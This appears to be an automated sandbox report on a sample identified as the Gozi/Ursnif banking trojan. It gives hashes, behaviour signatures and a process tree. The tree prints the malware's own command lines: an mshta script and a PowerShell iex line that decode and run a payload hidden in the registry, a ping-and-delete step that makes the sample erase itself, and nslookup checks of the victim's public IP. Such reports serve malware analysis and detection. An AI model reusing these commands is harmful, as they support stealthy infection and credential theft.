Analysis

  • max time kernel
    148s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    13-07-2020 17:05

General

  • Target

    3.exe

  • Size

    142KB

  • MD5

    5105430437588f8878da6957bc8c3119

  • SHA1

    818651e37ef71701165c3eb03c5c1813c1047b32

  • SHA256

    d5ccf9039136d23649240cd3879f6e9d40dae0dff2a5cfcdefc8535f93587c38

  • SHA512

    3149a53bc48feea00ce6067cf5bbe94ae5b65e933ffdd5ae4139d217c2e7e7e65fa636ab021d9a374e091a791c952e6f995e6cb923ddbfcc33d4d1e575e528b1

Malware Config

Signatures

  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 42 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: MapViewOfSection
    • Checks whether UAC is enabled
    • Suspicious use of WriteProcessMemory
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SendNotifyMessage
    PID:1316
    • C:\Users\Admin\AppData\Local\Temp\3.exe
      "C:\Users\Admin\AppData\Local\Temp\3.exe"
      2⤵
        PID:288
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\136B3805-56F5-BDAC-F8F7-EA41AC1BBE05\\\Efsltprf'));if(!window.flag)close()</script>"
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1000
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\136B3805-56F5-BDAC-F8F7-EA41AC1BBE05").dmrctcls))
          3⤵
          • Suspicious behavior: MapViewOfSection
          • Drops file in System32 directory
          • Suspicious use of WriteProcessMemory
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          PID:1792
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\utdl11l2\utdl11l2.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:520
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1B5C.tmp" "c:\Users\Admin\AppData\Local\Temp\utdl11l2\CSC3C5E1BE7974343F6AFB23EEC9B21371.TMP"
              5⤵
                PID:1616
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gy3tvbmd\gy3tvbmd.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1580
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1BF8.tmp" "c:\Users\Admin\AppData\Local\Temp\gy3tvbmd\CSCFA59C834462B4CF684B4D1546612B340.TMP"
                5⤵
                  PID:1952
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\3.exe"
            2⤵
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            • Deletes itself
            • Suspicious use of SetThreadContext
            PID:1452
            • C:\Windows\system32\PING.EXE
              ping localhost -n 5
              3⤵
              • Runs ping.exe
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              PID:1312
          • C:\Windows\system32\cmd.exe
            cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\5FB0.bi1"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1620
            • C:\Windows\system32\nslookup.exe
              nslookup myip.opendns.com resolver1.opendns.com
              3⤵
                PID:1952
            • C:\Windows\system32\cmd.exe
              cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\6040.bi1"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1628
              • C:\Windows\system32\nslookup.exe
                nslookup myip.opendns.com resolver1.opendns.com
                3⤵
                  PID:1916
              • C:\Windows\system32\cmd.exe
                cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5FB0.bi1"
                2⤵
                  PID:1880
                • C:\Windows\system32\cmd.exe
                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6040.bi1"
                  2⤵
                    PID:1308
                • C:\Program Files\Internet Explorer\iexplore.exe
                  "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                  1⤵
                  • Checks whether UAC is enabled
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of FindShellTrayWindow
                  PID:1060
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1060 CREDAT:275457 /prefetch:2
                    2⤵
                    • Checks whether UAC is enabled
                    • Modifies Internet Explorer settings
                    • Suspicious use of SetWindowsHookEx
                    PID:1800
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1060 CREDAT:537608 /prefetch:2
                    2⤵
                    • Checks whether UAC is enabled
                    • Modifies Internet Explorer settings
                    • Suspicious use of SetWindowsHookEx
                    PID:956

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • memory/288-0-0x0000000000E49000-0x0000000000E5A000-memory.dmp

                  Filesize

                  68KB

                • memory/288-1-0x0000000000F40000-0x0000000000F51000-memory.dmp

                  Filesize

                  68KB